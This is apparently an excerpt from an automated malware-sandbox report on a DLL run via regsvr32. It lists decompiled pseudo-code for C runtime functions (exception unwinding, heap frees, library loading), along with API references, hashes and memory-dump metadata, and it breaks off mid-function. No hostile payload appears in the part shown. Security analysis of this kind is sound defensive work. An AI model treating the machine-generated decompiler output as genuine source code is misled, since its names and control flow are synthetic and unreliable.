0x00000000
0x6e9eb2f0
0x6e9eb2f0
0x6e9eb2f0
0x6e9eb2f3
0x6e9eb2f6
0x6e9eb2f8
0x6e9eb2f9
0x6e9eb2fe
0x6e9eb301
0x6e9eb303
0x00000000
0x00000000
0x6e9eb305
0x6e9eb306
0x6e9eb309
0x6e9eb30b
0x00000000
0x6e9eb30d
0x6e9eb30d
0x6e9eb310
0x6e9eb313
0x00000000
0x6e9eb313
0x00000000
0x6e9eb30b
0x6e9eb327
0x6e9eb32d
0x6e9eb34a
0x6e9eb34f
0x6e9eb34f
0x6e9eb352
0x6e9eb352
0x00000000
0x6e9eb316
0x6e9eb316
0x6e9eb317
0x6e9eb31a
0x6e9eb31d
0x6e9eb320
0x6e9eb320
0x00000000
0x6e9eb325
0x6e9eb2c1
0x6e9eb2b3
0x6e9eb355
0x6e9eb358
0x6e9eb359
0x6e9eb35c
0x6e9eb35f
0x6e9eb362
0x6e9eb365
0x6e9eb365
0x6e9eb36e
0x6e9eb371
0x6e9eb371
0x6e9eb289
0x6e9eb374
0x6e9eb378
0x6e9eb37a
0x6e9eb37d
0x6e9eb383
0x6e9eb383
0x6e9eb38b
0x6e9eb390
0x6e9eb3fe
0x6e9eb3fe
0x6e9eb403
0x6e9eb407
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb392
0x6e9eb392
0x6e9eb396
0x6e9eb3a8
0x6e9eb3ab
0x6e9eb3ae
0x6e9eb3b0
0x6e9eb3c7
0x6e9eb3cb
0x6e9eb3d1
0x6e9eb3d2
0x6e9eb3d4
0x00000000
0x6e9eb3d6
0x00000000
0x6e9eb3d6
0x6e9eb3b2
0x6e9eb3b7
0x6e9eb3ba
0x6e9eb3bf
0x6e9eb3c2
0x00000000
0x6e9eb3c2
0x6e9eb398
0x6e9eb39b
0x6e9eb39e
0x6e9eb3a0
0x00000000
0x6e9eb3a2
0x6e9eb3a2
0x6e9eb3a6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb3a6
0x6e9eb3a0
0x6e9eb396
0x6e9eb240
0x6e9eb240
0x6e9eb247
0x00000000
0x6e9eb249
0x6e9eb249
0x6e9eb250
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb250
0x6e9eb247
0x6e9eb23e
0x6e9eb231
0x6e9eb1b1
0x6e9eb1b9
0x6e9eb1bc
0x6e9eb1c1
0x6e9eb1c5
0x6e9eb1c8
0x6e9eb1ce
0x6e9eb1d1
0x00000000
0x6e9eb1d3
0x6e9eb1d3
0x6e9eb1d6
0x6e9eb1d8
0x6e9eb40e
0x6e9eb40e
0x00000000
0x6e9eb1de
0x6e9eb1e6
0x6e9eb1f1
0x00000000
0x00000000
0x6e9eb1fa
0x6e9eb1fd
0x6e9eb1fe
0x6e9eb201
0x6e9eb203
0x00000000
0x6e9eb209
0x00000000
0x6e9eb209
0x00000000
0x6e9eb203
0x6e9eb1de
0x6e9eb413
0x6e9eb413
0x6e9eb415
0x6e9eb416
0x6e9eb41d
0x6e9eb420
0x6e9eb42e
0x6e9eb433
0x6e9eb438
0x6e9eb43b
0x6e9eb440
0x6e9eb443
0x6e9eb446
0x6e9eb448
0x6e9eb44a
0x6e9eb44a
0x6e9eb44f
0x6e9eb45b
0x6e9eb461
0x6e9eb466
0x6e9eb469
0x6e9eb46a
0x00000000
0x6e9eb46a
0x6e9eb1d1
0x6e9eb1af
0x6e9eb16f
0x6e9eb150
0x6e9eb142
0x6e9eb10e

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EB1C8
type_info::operator==.LIBVCRUNTIME ref: 6E9EB1EA
___TypeMatch.LIBVCRUNTIME ref: 6E9EB2F9
IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EB3CB
_UnwindNestedFrames.LIBCMT ref: 6E9EB44F
CallUnexpected.LIBVCRUNTIME ref: 6E9EB46A

Strings

csm, xrefs: 6E9EB108
csm, xrefs: 6E9EB175
csm, xrefs: 6E9EB221

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: fd0d6bd0518f12673e78f40b51eb64be5ca8fbc08558b3d15fd3067cc87f7f61
Instruction ID: 1c9ab93d6c74720c62ae2c054160482ef6b85860a53f79526490c2bb298f8b51
Opcode Fuzzy Hash: fd0d6bd0518f12673e78f40b51eb64be5ca8fbc08558b3d15fd3067cc87f7f61
Instruction Fuzzy Hash: FDB17A31801309EFCF26CFE4D880A9EB7B9BF54314F00455AEA146BA29E331DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ED878 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E9ED878(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6e9f5f50;
				if(_t68 != 0x6e9f5f50) {
					E6E9EDC0E(_t68);
					_t36 = _a4;
				}
				E6E9EDC0E( *((intOrPtr*)(_t36 + 0x3c)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x30)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x34)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x38)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x28)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x2c)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x40)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x44)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E9ED6A4(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E9ED70F(_t67, _t72, _t73, _t77);
			}

0x6e9ed878
0x6e9ed878
0x6e9ed878
0x6e9ed87d
0x6e9ed883
0x6e9ed885
0x6e9ed88b
0x6e9ed88e
0x6e9ed893
0x6e9ed896
0x6e9ed89a
0x6e9ed8a5
0x6e9ed8b0
0x6e9ed8bb
0x6e9ed8c6
0x6e9ed8d1
0x6e9ed8dc
0x6e9ed8e7
0x6e9ed8f5
0x6e9ed900
0x6e9ed908
0x6e9ed909
0x6e9ed90c
0x6e9ed912
0x6e9ed916
0x6e9ed91a
0x6e9ed91b
0x6e9ed925
0x6e9ed92b
0x6e9ed92c
0x6e9ed92f
0x6e9ed935
0x6e9ed939
0x6e9ed93d
0x6e9ed944

APIs

_free.LIBCMT ref: 6E9ED88E

Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9ED89A
_free.LIBCMT ref: 6E9ED8A5
_free.LIBCMT ref: 6E9ED8B0
_free.LIBCMT ref: 6E9ED8BB
_free.LIBCMT ref: 6E9ED8C6
_free.LIBCMT ref: 6E9ED8D1
_free.LIBCMT ref: 6E9ED8DC
_free.LIBCMT ref: 6E9ED8E7
_free.LIBCMT ref: 6E9ED8F5

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ae1c0220f0767e3020f3777b024cfa29791ba55b616ffd8e6930f3f11dcb20ce
Instruction ID: e3336625a2388467a3d9b77ff9fa68dbd612d5be499f2871ef8d2391a26da0d7
Opcode Fuzzy Hash: ae1c0220f0767e3020f3777b024cfa29791ba55b616ffd8e6930f3f11dcb20ce
Instruction Fuzzy Hash: A5219776940108EFCB52DFE4C881DDE7BBDBF98244F0145A6E6199B660DB71EA44CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EA9D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E9EA9D0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				signed int _t94;
				char _t96;
				signed int _t102;
				signed int _t103;
				signed int _t110;
				void* _t111;
				intOrPtr _t112;
				signed int _t113;
				signed int _t115;
				void* _t116;
				void* _t117;
				void* _t123;

				_t107 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E6E9F4630(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t113 = _t6;
				_push(_t113);
				_v20 = _t113;
				_v12 =  *(_t91 + 8) ^  *0x6e9fc024;
				E6E9EA990(_t91, __edx, _t111, _t113,  *(_t91 + 8) ^  *0x6e9fc024);
				E6E9EBBFC(_a12);
				_t68 = _a4;
				_t117 = _t116 + 0x10;
				_t112 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t112 - 0xfffffffe;
					if(_t112 != 0xfffffffe) {
						_t107 = 0xfffffffe;
						E6E9EBDF0(_t91, 0xfffffffe, _t113, 0x6e9fc024);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t112 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t94 = _v12;
							_t75 = _t112 + (_t112 + 2) * 2;
							_t91 =  *((intOrPtr*)(_t94 + _t75 * 4));
							_t76 = _t94 + _t75 * 4;
							_t95 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t96 = _v5;
								goto L7;
							} else {
								_t107 = _t113;
								_t77 = E6E9EBD90(_t95, _t113);
								_t96 = 1;
								_v5 = 1;
								_t123 = _t77;
								if(_t123 < 0) {
									_v16 = 0;
									L13:
									_push(_t113);
									E6E9EA990(_t91, _t107, _t112, _t113, _v12);
									goto L14;
								} else {
									if(_t123 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x6e9f5474;
											if(__eflags != 0) {
												_t87 = E6E9F44D0(__eflags, 0x6e9f5474);
												_t117 = _t117 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t115 =  *0x6e9f5474; // 0x6e9eab2e
													 *0x6e9f51b8(_a4, 1);
													 *_t115();
													_t113 = _v20;
													_t117 = _t117 + 8;
												}
												_t78 = _a4;
											}
										}
										_t108 = _t78;
										E6E9EBDD0(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t112;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t112) {
											_t108 = _t112;
											E6E9EBDF0(_t80, _t112, _t113, 0x6e9fc024);
											_t80 = _a8;
										}
										_push(_t113);
										 *((intOrPtr*)(_t80 + 0xc)) = _t91;
										E6E9EA990(_t91, _t108, _t112, _t113, _v12);
										E6E9EBDB0();
										asm("int3");
										_push(8);
										_push(0x6e9fa6a8);
										E6E9E9960(_t91, _t112, _t113);
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t102 =  *(_t83 + 0x1c);
														__eflags = _t102;
														if(_t102 != 0) {
															_t110 =  *(_t102 + 4);
															__eflags = _t110;
															if(_t110 == 0) {
																__eflags =  *_t102 & 0x00000010;
																if(( *_t102 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t103 =  *_t83;
																	__eflags = _t103;
																	if(_t103 != 0) {
																		 *0x6e9f51b8(_t103);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E6E9EABCF( *(_t83 + 0x18), _t110);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t112 = _t91;
						} while (_t91 != 0xfffffffe);
						if(_t96 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

0x6e9ea9d0
0x6e9ea9d7
0x6e9ea9dc
0x6e9ea9e2
0x6e9ea9ee
0x6e9ea9f0
0x6e9ea9f6
0x6e9ea9f6
0x6e9ea9ff
0x6e9eaa01
0x6e9eaa04
0x6e9eaa07
0x6e9eaa0f
0x6e9eaa14
0x6e9eaa17
0x6e9eaa1a
0x6e9eaa21
0x6e9eaa7d
0x6e9eaa80
0x6e9eaa88
0x6e9eaa8f
0x00000000
0x6e9eaa8f
0x00000000
0x6e9eaa23
0x6e9eaa23
0x6e9eaa29
0x6e9eaa2f
0x6e9eaa35
0x6e9eaaa0
0x6e9eaaa9
0x6e9eaa37
0x6e9eaa37
0x6e9eaa37
0x6e9eaa3d
0x6e9eaa40
0x6e9eaa43
0x6e9eaa46
0x6e9eaa49
0x6e9eaa4e
0x6e9eaa64
0x00000000
0x6e9eaa50
0x6e9eaa50
0x6e9eaa52
0x6e9eaa57
0x6e9eaa59
0x6e9eaa5c
0x6e9eaa5e
0x6e9eaa74
0x6e9eaa94
0x6e9eaa94
0x6e9eaa98
0x00000000
0x6e9eaa60
0x6e9eaa60
0x6e9eaaaa
0x6e9eaaad
0x6e9eaab3
0x6e9eaab5
0x6e9eaabc
0x6e9eaac3
0x6e9eaac8
0x6e9eaacb
0x6e9eaacd
0x6e9eaacf
0x6e9eaadc
0x6e9eaae2
0x6e9eaae4
0x6e9eaae7
0x6e9eaae7
0x6e9eaaea
0x6e9eaaea
0x6e9eaabc
0x6e9eaaf0
0x6e9eaaf2
0x6e9eaaf7
0x6e9eaafa
0x6e9eaafd
0x6e9eab05
0x6e9eab09
0x6e9eab0e
0x6e9eab0e
0x6e9eab11
0x6e9eab15
0x6e9eab18
0x6e9eab28
0x6e9eab2d
0x6e9eab2e
0x6e9eab30
0x6e9eab35
0x6e9eab3a
0x6e9eab3d
0x6e9eab3f
0x6e9eab41
0x6e9eab47
0x6e9eab49
0x6e9eab4d
0x6e9eab4f
0x6e9eab56
0x6e9eab6a
0x6e9eab6a
0x6e9eab6d
0x6e9eab6f
0x6e9eab71
0x6e9eab74
0x6e9eab76
0x6e9eaba1
0x6e9eaba4
0x6e9eaba6
0x6e9eaba9
0x6e9eabab
0x6e9eabad
0x6e9eabb7
0x6e9eabbd
0x6e9eabbd
0x6e9eabad
0x6e9eab78
0x6e9eab78
0x6e9eab78
0x6e9eab78
0x6e9eab80
0x6e9eab85
0x6e9eab85
0x6e9eab76
0x6e9eab58
0x6e9eab58
0x6e9eab5f
0x00000000
0x6e9eab61
0x6e9eab61
0x6e9eab68
0x00000000
0x00000000
0x6e9eab68
0x6e9eab5f
0x6e9eab56
0x6e9eab4d
0x6e9eab47
0x6e9eabc2
0x6e9eabce
0x6e9eaa62
0x00000000
0x6e9eaa62
0x6e9eaa60
0x6e9eaa5e
0x00000000
0x6e9eaa67
0x6e9eaa67
0x6e9eaa69
0x6e9eaa70
0x00000000
0x6e9eaa72
0x00000000
0x6e9eaa70
0x6e9eaa35
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E9EAA07
___except_validate_context_record.LIBVCRUNTIME ref: 6E9EAA0F
_ValidateLocalCookies.LIBCMT ref: 6E9EAA98
__IsNonwritableInCurrentImage.LIBCMT ref: 6E9EAAC3
_ValidateLocalCookies.LIBCMT ref: 6E9EAB18

Strings

csm, xrefs: 6E9EAAAD

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b6200cc9d2cdfc8b1e602c92f1a4893793c4a1b0a9e492fb3d485aec22a716ff
Instruction ID: 34952f5d1864a5f15eddfba35a8d617eb22b0908dcfee20b1cb9ac66c0a63214
Opcode Fuzzy Hash: b6200cc9d2cdfc8b1e602c92f1a4893793c4a1b0a9e492fb3d485aec22a716ff
Instruction Fuzzy Hash: 6D41B330A00309AFCF02CFA9C980ADE7BFAAF85318F008555EA156B765D771DA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EDCF3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EDCF3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e9fd560 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e9f6200 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E9ED618(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E9ED618(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6e9edcfc
0x6e9edda6
0x6e9edd04
0x6e9edd06
0x6e9edd0d
0x6e9edd0f
0x6e9edd15
0x6e9edd22
0x6e9edd37
0x6e9edd3b
0x6e9edd8d
0x6e9edd8d
0x6e9edd92
0x6e9edd96
0x6e9edd99
0x6e9edd99
0x6e9edd9f
0x6e9edda1
0x6e9eddb6
0x6e9eddb1
0x6e9eddb5
0x6e9eddb5
0x6e9edda3
0x6e9edda3
0x00000000
0x6e9edda3
0x6e9edd3d
0x6e9edd46
0x6e9edd7d
0x6e9edd7d
0x6e9edd7f
0x6e9edd81
0x00000000
0x00000000
0x6e9edd89
0x00000000
0x6e9edd89
0x6e9edd50
0x6e9edd55
0x6e9edd5a
0x00000000
0x00000000
0x6e9edd64
0x6e9edd69
0x6e9edd6e
0x00000000
0x00000000
0x6e9edd73
0x6e9edd79
0x00000000
0x6e9edd79
0x6e9edd1a
0x00000000
0x00000000
0x00000000
0x6e9edd20
0x6e9eddaf
0x00000000

Strings

ext-ms-, xrefs: 6E9EDD5E
api-ms-, xrefs: 6E9EDD4A

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: ca010af1f97b6da24e20a4debaf1ce9859ef3f6f78de75df198fff31c1f9b9c6
Instruction ID: 457525da2d844ee9e9c43fb421d24fba73abeb36415b091f1d94c4bca980451e
Opcode Fuzzy Hash: ca010af1f97b6da24e20a4debaf1ce9859ef3f6f78de75df198fff31c1f9b9c6
Instruction Fuzzy Hash: 1321A171A45721ABDB538AB59C44B4A3B6C9FC2764F110550EA15ABF80D720ED40CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F19AC Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F19AC(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6E9F1974(_t45, 7);
					E6E9F1974(_t45 + 0x1c, 7);
					E6E9F1974(_t45 + 0x38, 0xc);
					E6E9F1974(_t45 + 0x68, 0xc);
					E6E9F1974(_t45 + 0x98, 2);
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa0)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa4)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa8)));
					E6E9F1974(_t45 + 0xb4, 7);
					E6E9F1974(_t45 + 0xd0, 7);
					E6E9F1974(_t45 + 0xec, 0xc);
					E6E9F1974(_t45 + 0x11c, 0xc);
					E6E9F1974(_t45 + 0x14c, 2);
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x154)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x158)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E9EDC0E( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e9f19b2
0x6e9f19b7
0x6e9f19c0
0x6e9f19cb
0x6e9f19d6
0x6e9f19e1
0x6e9f19ef
0x6e9f19fa
0x6e9f1a05
0x6e9f1a10
0x6e9f1a1e
0x6e9f1a2c
0x6e9f1a3d
0x6e9f1a4b
0x6e9f1a59
0x6e9f1a64
0x6e9f1a6f
0x6e9f1a7a
0x00000000
0x6e9f1a8a
0x6e9f1a8f

APIs

Part of subcall function 6E9F1974: _free.LIBCMT ref: 6E9F1999

_free.LIBCMT ref: 6E9F19FA

Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9F1A05
_free.LIBCMT ref: 6E9F1A10
_free.LIBCMT ref: 6E9F1A64
_free.LIBCMT ref: 6E9F1A6F
_free.LIBCMT ref: 6E9F1A7A
_free.LIBCMT ref: 6E9F1A85

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
Instruction ID: c168b81bb5a8b06410f6969c40084f1bfc967045f21e6affc3b2ccb5acc2d7b1
Opcode Fuzzy Hash: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
Instruction Fuzzy Hash: 8F119AB1580B08FBD621ABF1CC06FDB779CAFA2308F400D14A2A9A7152CB64E4498FC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F0921 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E6E9F0921(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x6e9fc024; // 0x45ebcfb3
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
